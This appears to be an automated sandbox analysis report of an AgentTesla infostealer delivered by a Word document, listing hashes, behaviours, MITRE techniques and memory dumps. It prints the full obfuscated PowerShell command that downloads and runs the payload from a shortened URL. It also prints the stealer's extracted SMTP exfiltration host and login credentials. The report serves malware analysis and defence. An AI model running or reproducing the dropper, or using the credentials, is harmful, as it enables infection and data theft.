agenttesla | b25e473d3fd1772bb3fcc4faec21fbdb5c1a5a2b2e3dcad5702d7466c8d7b9ce

General

Target

IMG_1035_80_63.doc
Size

33KB
MD5

f1c7f28c1e71d97feabc188c267fd4a8
SHA1

bc323d3cb3234f98cfca8540ae9e7eb1ac29ab06
SHA256

b25e473d3fd1772bb3fcc4faec21fbdb5c1a5a2b2e3dcad5702d7466c8d7b9ce
SHA512

5ecc4583ad9904c808b52efdf9821c8e2b38df9e84af199b7265c3c95e5417b42030ebccbcd92de8774c46d466d97902a336c0da5de4aad5870034670fb49c52

Score

10^/10

agenttesla keylogger spyware stealer trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://bit.ly/3ccVgSJ

Extracted

Family

agenttesla

Credentials

Protocol: smtp
Host:
sixjan.club
Port:
587
Username:
[email protected]
Password:
{DsG_Z,9Yl50

Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
keylogger trojan stealer spyware agenttesla

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

powershell.exe

description	pid	pid_target	process	target process
Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process	3564	580	powershell.exe	WINWORD.EXE

AgentTesla Payload 2 IoCs

Processes:

resource	yara_rule
behavioral2/memory/4028-26-0x0000000000400000-0x000000000043C000-memory.dmp	family_agenttesla
behavioral2/memory/4028-27-0x000000000043762E-mapping.dmp	family_agenttesla

Beds Protector Packer 1 IoCs

Detects Beds Protector packer used to load .NET malware.

Processes:

resource	yara_rule
behavioral2/memory/764-21-0x0000000005470000-0x00000000054EC000-memory.dmp	beds_protector

Blocklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow pid process

23 3564 powershell.exe
25 3564 powershell.exe
Executes dropped EXE 2 IoCs

Processes:

pauele.exepauele.exe

pid process

764 pauele.exe
4028 pauele.exe
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Suspicious use of SetThreadContext 1 IoCs

Processes:

pauele.exe

description pid process target process

PID 764 set thread context of 4028 764 pauele.exe pauele.exe

flow	pid	process
23	3564	powershell.exe
25	3564	powershell.exe

pid	process
764	pauele.exe
4028	pauele.exe

description	pid	process	target process
PID 764 set thread context of 4028	764	pauele.exe	pauele.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 2 IoCs

Processes:

WINWORD.EXE

pid process

580 WINWORD.EXE
580 WINWORD.EXE
Suspicious behavior: EnumeratesProcesses 5 IoCs

Processes:

powershell.exepauele.exe

pid process

3564 powershell.exe
3564 powershell.exe
3564 powershell.exe
4028 pauele.exe
4028 pauele.exe
Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

WINWORD.EXE

pid process

580 WINWORD.EXE
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepauele.exe

description pid process

Token: SeDebugPrivilege 3564 powershell.exe
Token: SeDebugPrivilege 4028 pauele.exe

pid	process
3564	powershell.exe
3564	powershell.exe
3564	powershell.exe
4028	pauele.exe
4028	pauele.exe

description	pid	process
Token: SeDebugPrivilege	3564	powershell.exe
Token: SeDebugPrivilege	4028	pauele.exe

Suspicious use of SetWindowsHookEx 17 IoCs

Processes:

WINWORD.EXE

pid	process
580	WINWORD.EXE
580	WINWORD.EXE
580	WINWORD.EXE
580	WINWORD.EXE
580	WINWORD.EXE
580	WINWORD.EXE
580	WINWORD.EXE
580	WINWORD.EXE
580	WINWORD.EXE
580	WINWORD.EXE
580	WINWORD.EXE
580	WINWORD.EXE
580	WINWORD.EXE
580	WINWORD.EXE
580	WINWORD.EXE
580	WINWORD.EXE
580	WINWORD.EXE

Suspicious use of WriteProcessMemory 13 IoCs

Processes:

WINWORD.EXEpowershell.exepauele.exe

description	pid	process	target process
PID 580 wrote to memory of 3564	580	WINWORD.EXE	powershell.exe
PID 580 wrote to memory of 3564	580	WINWORD.EXE	powershell.exe
PID 3564 wrote to memory of 764	3564	powershell.exe	pauele.exe
PID 3564 wrote to memory of 764	3564	powershell.exe	pauele.exe
PID 3564 wrote to memory of 764	3564	powershell.exe	pauele.exe
PID 764 wrote to memory of 4028	764	pauele.exe	pauele.exe
PID 764 wrote to memory of 4028	764	pauele.exe	pauele.exe
PID 764 wrote to memory of 4028	764	pauele.exe	pauele.exe
PID 764 wrote to memory of 4028	764	pauele.exe	pauele.exe
PID 764 wrote to memory of 4028	764	pauele.exe	pauele.exe
PID 764 wrote to memory of 4028	764	pauele.exe	pauele.exe
PID 764 wrote to memory of 4028	764	pauele.exe	pauele.exe
PID 764 wrote to memory of 4028	764	pauele.exe	pauele.exe

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\IMG_1035_80_63.doc" /o ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:580

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" INvOkE-EXpRessiOn((('t9Qclien'+'t '+'= new'+'-'+'object S'+'ys'+'tem.Net.'+'WebClient'+';t9Qa'+' = AEi'+'https://bit.ly/3ccVgSJ'+'AEi.Spl'+'i'+'t'+'('+'AEi'+','+'AEi);t9Qhu'+'as = '+'t'+'9Q'+'env:temp'+' + AEi'+'c4g'+'pauele.exe'+'AEi;for'+'each'+'(t9'+'Q'+'b'+' in t9Qa)'+'{try{t9Qclie'+'nt'+'.DownloadFil'+'e(t9Qb.ToS'+'t'+'ring()'+','+' '+'t9Qhuas);I'+'nvoke-Item(t9Qhua'+'s);'+'b'+'reak;}catch{'+'write-hos'+'t t'+'9Q'+'_.Exce'+'ption.Me'+'ssa'+'ge'+'}};') -rePlacE't9Q',[ChAr]36 -crEPLacE'c4g',[ChAr]92 -crEPLacE'AEi',[ChAr]39) )
2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3564

C:\Users\Admin\AppData\Local\Temp\pauele.exe
"C:\Users\Admin\AppData\Local\Temp\pauele.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:764

C:\Users\Admin\AppData\Local\Temp\pauele.exe
"C:\Users\Admin\AppData\Local\Temp\pauele.exe"
4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4028

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Credentials in Files

3

T1081

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Data from Local System

3

T1005

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\pauele.exe
MD5
7442ea0814ae37240953a004cc6f74de

SHA1
a055479cdb44b950f18980447993844f13a6ddf4

SHA256
f44c6b4f6b79e047028d631ae551bc9dc1ef54b80d7943b2bb1044da53020a2a

SHA512
e5e63bd3dc9c36c35f3aa55de58ddac79a9b446406fb2bb5aa68aa3c9822cd1ce1bdc3afab49bdbc53206c52b76efb4f7c3a4c0d94b24853ed45a869b5e3ed67

Download Submit
C:\Users\Admin\AppData\Local\Temp\pauele.exe
MD5
7442ea0814ae37240953a004cc6f74de

SHA1
a055479cdb44b950f18980447993844f13a6ddf4

SHA256
f44c6b4f6b79e047028d631ae551bc9dc1ef54b80d7943b2bb1044da53020a2a

SHA512
e5e63bd3dc9c36c35f3aa55de58ddac79a9b446406fb2bb5aa68aa3c9822cd1ce1bdc3afab49bdbc53206c52b76efb4f7c3a4c0d94b24853ed45a869b5e3ed67

Download Submit
C:\Users\Admin\AppData\Local\Temp\pauele.exe
MD5
7442ea0814ae37240953a004cc6f74de

SHA1
a055479cdb44b950f18980447993844f13a6ddf4

SHA256
f44c6b4f6b79e047028d631ae551bc9dc1ef54b80d7943b2bb1044da53020a2a

SHA512
e5e63bd3dc9c36c35f3aa55de58ddac79a9b446406fb2bb5aa68aa3c9822cd1ce1bdc3afab49bdbc53206c52b76efb4f7c3a4c0d94b24853ed45a869b5e3ed67

Download Submit
memory/580-2-0x00007FFD37CB0000-0x00007FFD37CC0000-memory.dmp

Filesize
64KB

Download
memory/580-6-0x00007FFD5D8F0000-0x00007FFD5DF27000-memory.dmp

Filesize
6.2MB

Download
memory/580-7-0x00007FFD34E20000-0x00007FFD34E30000-memory.dmp

Filesize
64KB

Download
memory/580-3-0x00007FFD37CB0000-0x00007FFD37CC0000-memory.dmp

Filesize
64KB

Download
memory/580-5-0x00007FFD37CB0000-0x00007FFD37CC0000-memory.dmp

Filesize
64KB

Download
memory/580-4-0x00007FFD37CB0000-0x00007FFD37CC0000-memory.dmp

Filesize
64KB

Download
memory/764-24-0x0000000005760000-0x0000000005761000-memory.dmp

Filesize
4KB

Download
memory/764-25-0x00000000055B0000-0x00000000055BF000-memory.dmp

Filesize
60KB

Download
memory/764-23-0x0000000005620000-0x0000000005621000-memory.dmp

Filesize
4KB

Download
memory/764-22-0x0000000005A20000-0x0000000005A21000-memory.dmp

Filesize
4KB

Download
memory/764-15-0x0000000000000000-mapping.dmp

Download
memory/764-21-0x0000000005470000-0x00000000054EC000-memory.dmp

Filesize
496KB

Download
memory/764-33-0x00000000054F0000-0x00000000054F1000-memory.dmp

Filesize
4KB

Download
memory/764-18-0x0000000073F30000-0x000000007461E000-memory.dmp

Filesize
6.9MB

Download
memory/764-19-0x0000000000C50000-0x0000000000C51000-memory.dmp

Filesize
4KB

Download
memory/3564-10-0x000001F221B30000-0x000001F221B31000-memory.dmp

Filesize
4KB

Download
memory/3564-9-0x00007FFD50480000-0x00007FFD50E6C000-memory.dmp

Filesize
9.9MB

Download
memory/3564-13-0x000001F221B63000-0x000001F221B65000-memory.dmp

Filesize
8KB

Download
memory/3564-12-0x000001F221B60000-0x000001F221B62000-memory.dmp

Filesize
8KB

Download
memory/3564-11-0x000001F221DF0000-0x000001F221DF1000-memory.dmp

Filesize
4KB

Download
memory/3564-8-0x0000000000000000-mapping.dmp

Download
memory/3564-14-0x000001F221B66000-0x000001F221B68000-memory.dmp

Filesize
8KB

Download
memory/4028-27-0x000000000043762E-mapping.dmp

Download
memory/4028-29-0x0000000073F30000-0x000000007461E000-memory.dmp

Filesize
6.9MB

Download
memory/4028-26-0x0000000000400000-0x000000000043C000-memory.dmp

Filesize
240KB

Download
memory/4028-35-0x00000000050C0000-0x00000000050C1000-memory.dmp

Filesize
4KB

Download
memory/4028-36-0x0000000005450000-0x0000000005451000-memory.dmp

Filesize
4KB

Download
memory/4028-37-0x0000000005C00000-0x0000000005C01000-memory.dmp

Filesize
4KB

Download
memory/4028-39-0x0000000002920000-0x0000000002921000-memory.dmp

Filesize
4KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads